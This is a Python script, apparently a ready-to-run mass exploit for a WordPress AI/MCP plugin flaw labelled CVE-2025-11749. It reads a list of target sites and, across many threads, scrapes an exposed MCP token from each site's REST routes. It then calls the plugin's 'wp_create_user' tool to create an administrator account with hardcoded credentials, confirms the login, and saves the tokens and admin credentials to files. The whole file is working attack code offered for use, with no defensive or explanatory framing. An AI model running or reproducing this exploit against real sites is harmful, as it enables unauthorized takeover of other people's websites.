# encoding: utf-8 # by: Nxploited ( Khaled Alenazi ) # Telegram: https://t.me/KNxploited # GitHub: https://github.com/Nxploited import threading import requests import time import os import sys import urllib3 from rich.console import Console from rich.text import Text from rich.panel import Panel from rich.theme import Theme from rich import box from random import randint import json init_theme = Theme({ "banner": "bold white on rgb(34,49,63)", "usage": "bold bright_cyan on rgb(27,37,47)", "info": "bold bright_magenta on rgb(31,31,37)", "success": "bold white on green", "error": "bold white on red", "detect": "bold yellow on rgb(27,74,198)", "progress": "bold magenta", "highlight": "bold cyan on rgb(8,15,34)", "tokenid": "bold white on rgb(38,154,16)", "inputbox": "bold bright_magenta on rgb(27,74,198)", }) console = Console(theme=init_theme) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) os.environ['NO_PROXY'] = '*' Nxploited_success_file = "success_results.txt" Nxploited_admin_file = "created_admins.txt" Nxploited_tokens_file = "tokens_only.txt" target_username = "nxploited" target_password = "StrongPass!321" target_email = "admin@nxploit.local" user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" def Nxploited_write_token(target, token=None): if token and token.strip(): with open(Nxploited_tokens_file, "a") as f: f.write(f"{target} | token: {token}\n") txt = f"[white]{target}[/white] | [bold cyan]token:[/bold cyan] [yellow]{token}[/yellow]" console.print(txt, style="tokenid") def professional_banner(): banner = """ ===================================================================================================================================== === == ==== = ============= ===== ===== ==== ============= ======= ==== ====== ===== === == === = ==== = ================= = == == == = == =================== ====== ==== ===== ===== ==== === = = ======= ==== = ================ === = ==== = === = ==================== ======= ========== ===== === ===== = = ======= ==== = ===================== == ==== ====== == = =============== ======= ========= ===== = === ===== = = ======= == = === ===== === ==== ===== === === == ==== ======= ======== ===== == ==== === = = ======== == == =================== ==== ==== ==== ==== ===== ============= ======= ======= ===== === ====== = = = ======== == == ================== ===== ==== === ============ ============= ======= ======= ===== ======== = == === === === ================= ====== == == ====== ==== ============== ======= ======= ========== === ===== = === ===== ==== ========== === == ==== ============= === ===== ========== ==== == ===================================================================================================================================== """ for line in banner.splitlines(): color = f"rgb({randint(34,85)},{randint(49,160)},{randint(63,255)})" console.print(Text(line,style=color), style="banner") time.sleep(0.002) console.print("\n") subtitle = "[highlight]Mass MCP Exploit | By: Khaled Alenazi (Nxploited)[/highlight]" console.print(subtitle, style="info") def show_usage_panel(): usage = ( "[usage]How to Use:[/usage]\n\n" "[highlight]Step 1:[/] Place all target URLs in [bold]list.txt[/] (one URL per line).\n" "[highlight]Step 2:[/] Run from terminal: [bold cyan]python CVE-2025-11749.py[/bold cyan]\n" "[highlight]Step 3:[/] After pressing ENTER, enter the targets file and number of threads.\n" "[highlight]Step 4:[/] Results saved to:\n" " [bright_cyan]Success targets:[/] [bold]success_results.txt[/]\n" " [bright_cyan]Created admins:[/] [bold]created_admins.txt[/]\n" " [bright_cyan]Tokens:[/] [bold]tokens_only.txt[/]\n" ) console.print(Panel(usage, box=box.ROUNDED, style="usage", border_style="cyan")) def wait_enter(): msg = "[inputbox]Press ENTER to start exploitation or Ctrl+C to exit...[/inputbox]" console.print(Panel(msg, box=box.ROUNDED, style="info")) try: input() except KeyboardInterrupt: console.print(Panel("[error]Exiting...[/error]", style="error")) sys.exit(0) def Nxploited_parse_args(): list_file = console.input("[inputbox]Enter target file name (e.g., list.txt):[/inputbox] ").strip() threads = console.input("[inputbox]Enter number of threads (default 10):[/inputbox] ").strip() if not threads.isdigit() or int(threads) < 1: threads = 10 else: threads = int(threads) return list_file, threads def Nxploited_internet_check(): while True: try: requests.head("https://www.google.com", timeout=4) return True except Exception: console.print("[error]Internet disconnected. Waiting to resume...", style="error") time.sleep(5) def Nxploited_read_targets(filename): targets = [] with open(filename, "r") as f: for line in f: url = line.strip() if url: if not url.lower().startswith(('http://', 'https://')): url = 'http://' + url targets.append(url) return targets def Nxploited_write_result(filename, msg): with open(filename, "a") as f: f.write(f"{msg}\n") def check_plugin_installed(target_url): try: resp = requests.get(f"{target_url.rstrip('/')}/wp-json/", headers={'User-Agent': user_agent}, verify=False, timeout=10) data = resp.json() routes = list(data.get('routes', {}).keys()) mwai_found = any(r.startswith("/mwai/v1/") for r in routes) mcp_found = any(r.startswith("/mcp/v1/") for r in routes) return mwai_found or mcp_found except Exception: return False def find_token(target_url): try: resp = requests.get(f"{target_url.rstrip('/')}/wp-json/mcp/v1/", headers={'User-Agent': user_agent}, verify=False, timeout=15) j = resp.json() for route in j.get("routes", {}): parts = route.strip("/").split("/") if len(parts) >= 4 and parts[0] == "mcp" and parts[1] == "v1" and parts[-1] == "sse": token = parts[2] if token and "/" not in token and "\\" not in token: Nxploited_write_token(target_url, token=token) return token found = [x for x in j.get("routes", {}) if x.startswith("/mcp/v1/") and x.endswith("/sse")] if found: token = found[0].split("/")[4] if token and "/" not in token and "\\" not in token: Nxploited_write_token(target_url, token=token) return token except Exception: pass return None def get_session_id(target_url, token): url = f"{target_url.rstrip('/')}/wp-json/mcp/v1/{token}/sse" headers = { "Accept": "text/event-stream", "Connection": "keep-alive", "Cache-Control": "no-cache", "User-Agent": user_agent } try: with requests.get(url, headers=headers, verify=False, timeout=10, stream=True) as resp: for idx, line in enumerate(resp.iter_lines(decode_unicode=True)): if line: line_str = line.strip() if line_str.startswith("id:"): session_id = line_str.split("id:", 1)[-1].strip() if session_id: return session_id if idx > 20: break except Exception: pass return None def try_exploit(target_url, token, session_id): exploit_url = f"{target_url.rstrip('/')}/wp-json/mcp/v1/{token}/sse" payload = { "jsonrpc": "2.0", "id": 1337, "method": "tools/call", "params": { "name": "wp_create_user", "arguments": { "user_login": target_username, "user_email": target_email, "user_pass": target_password, "role": "administrator" } } } try: resp = requests.post( exploit_url, headers={'Content-Type':'application/json', 'User-Agent':user_agent}, data=json.dumps(payload), verify=False, timeout=30 ) try: res_json = resp.json() except Exception: res_json = {} try: result = res_json.get("result", {}) content = result.get("content", []) found_success = False created_id = None for item in content: if isinstance(item, dict): if "text" in item: text = item["text"] if "User created" in text and "ID" in text: found_success = True created_id = text elif "success" in text or "created" in text: found_success = True if found_success: break if found_success: return True, f"{target_url} | {target_username}:{target_password} | {created_id if created_id else ''}" except Exception: pass if resp.status_code == 204: return True, f"{target_url} | {target_username}:{target_password}" return False, res_json except Exception as e: return False, str(e) def login_and_confirm(target_url, username, password): login_url = f"{target_url.rstrip('/')}/wp-login.php" session = requests.Session() try: response = session.post( login_url, verify=False, data={ 'log': username, 'pwd': password, 'rememberme': 'forever', 'wp-submit': 'Log+In' }, headers={"User-Agent": user_agent} ) logged_in = any('wordpress_logged_in' in cookie.name for cookie in session.cookies) success_conditions = [ logged_in, 'dashboard' in response.url.lower(), '/wp-admin' in response.url.lower(), 'wp-admin' in response.text ] return any(success_conditions) except Exception: return False def print_success_box(target_url, login_success): panel_text = ( f"\n[bold white on green]✔️ Exploitation Successful![/bold white on green]\n" f"[bold blue]Target:[/] [bold white]{target_url}[/]\n" f"[bold blue]WP Admin:[/] [bold green]{target_url.rstrip('/')}/wp-login.php[/]\n" f"[bold magenta]Username:[/] [white]{target_username}\n" f"[bold magenta]Password:[/] [white]{target_password}\n" f"[bold yellow]Dashboard login: {'SUCCESSFUL' if login_success else 'FAILED'}[/bold yellow]\n" ) console.print(Panel(panel_text, box=box.DOUBLE, style="success", border_style="green")) def Nxploited_worker(thread_id, targets): for target in targets: Nxploited_internet_check() if not check_plugin_installed(target): console.print(f"{target} | Plugin not installed or not vulnerable.", style="error") continue else: console.print(f"{target} | Plugin detected or vulnerable, exploiting...", style="detect") token = find_token(target) if not token: console.print(f"{target} | Token not found, skipping.", style="error") continue session_id = get_session_id(target, token) if not session_id: console.print(f"{target} | Could not get session_id, skipping.", style="error") continue success, detail = try_exploit(target, token, session_id) if not success: console.print(f"{target} | Exploit failed.", style="error") continue login_success = login_and_confirm(target, target_username, target_password) print_success_box(target, login_success) if login_success: Nxploited_write_result(Nxploited_success_file, f"{target} | {token} | {session_id}") Nxploited_write_result(Nxploited_admin_file, detail) else: console.print(f"{target} | Admin created but login FAILED (credentials not saved).", style="error") def Nxploited_chunkify(lst, n): return [lst[i::n] for i in range(n)] def Nxploited(): professional_banner() show_usage_panel() wait_enter() list_file, num_threads = Nxploited_parse_args() targets = Nxploited_read_targets(list_file) console.print(Panel( f"Preparing threads...", box=box.ROUNDED, style="highlight", border_style="blue" )) time.sleep(0.5) target_chunks = Nxploited_chunkify(targets, num_threads) threads = [] for i in range(num_threads): th = threading.Thread(target=Nxploited_worker, args=(i, target_chunks[i])) th.daemon = True th.start() threads.append(th) for th in threads: th.join() console.print(Panel( f"All targets processed.\nCheck [bold green]{Nxploited_success_file}[/] for successes.\nAdmin accounts saved in [bold green]{Nxploited_admin_file}[/]\nTokens saved in [bold green]{Nxploited_tokens_file}[/]", box=box.DOUBLE, style="highlight", border_style="cyan" )) if __name__ == "__main__": Nxploited()